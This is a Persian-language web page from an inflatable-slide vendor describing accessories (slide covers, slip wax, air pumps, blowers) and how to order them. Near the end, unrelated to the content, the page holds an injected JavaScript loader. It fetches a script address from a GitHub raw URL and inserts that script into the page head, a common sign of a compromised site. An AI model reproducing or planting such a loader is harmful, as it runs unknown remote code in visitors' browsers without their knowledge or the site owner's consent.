لوازم جانبی سرسره بادی
لوازم جانبی

لوازم جانبی سرسره بادی

  • هر دستگاه ( سرسره بادی و … ) شامل یک سری لوازم جانبی می باشد که برای هر دستگاه لوازم جانبی فرق دارد.

    لوازم جانبی – روکش سر

    روکش سر برای هر یک از دستگاه ها متفاوت است و ابعاد اندازه ان بستگی به روکش سر دارد. داشتن روکش سر الزامی است چنانچه روکش سر شما پاره و یا تاریخ انقضای آن بگذرد باید روکش را تعویض کنید. به هیچ وجه دستگاه را بدونه روکش سر استفاده نکنید. جنس روکش سر با جنس بدنه یکی نمی باشد. جنس روکش سر لغزنده و سر است و برای سر شدن و شتاب بیشترآن از مواد سر کننده ( واکس سر کننده ) که جلو تر در مورد این مواد و خاصیتش صحبت می کنیم.

    واکس ( مواد سر کننده )

    واکس یکی از واجبات هر دستگاه می باشد. این مواد جای دور از دسترس کودکان خود قرار دهید. این مواد پارچه نانو و مانع جذب گرد خاک می شود. این مواد را هر بار قبل از استفاده بر روی روکش سر سپری کنید و یک تکه ابر آن را پخش کنید. واکس ها به 2 دسته 10 لیتری و 20 لیتری تقسیم می شود.

    دمنده هوا ( پمپ )

    این پمپ برای هر دستگاه لازم می باشد. این دمنده بسیار خطر ناک است برای کودکان باید برای دمنده ها یک قفس مکعب شکل درست کرده و پمپ را داخل ان بگذاریم. یکی دیگه از اشتباه های رایج افراد این است که دریچه روی بدنه پمپ را باید باز باشد. این دریچه برای میزان تنزیم فشار هوا می باشد. دمنده به 3 دسته پمپ 0.5 اسب، 1 اسب، 1.5 اسب تقسیم می شود.

    بلوور ها

    بلوور ها برای تشک بادی، چادر بادی، ارک های تبلیغاتی و … به کار می رود. این بلوور ها به 4 دسته بلوور ایزی پاور 1200 وات e1200، بلوور گریتک 1200 وات g1200، بلوور گریتک 900 وات g900، بلوور آپ استریت 800 وات u800 تقسیم می شود.

    نحوه خرید لوازم جانبی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید لوازم جانبی (دمنده هوا، روکش سر و.. ) به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید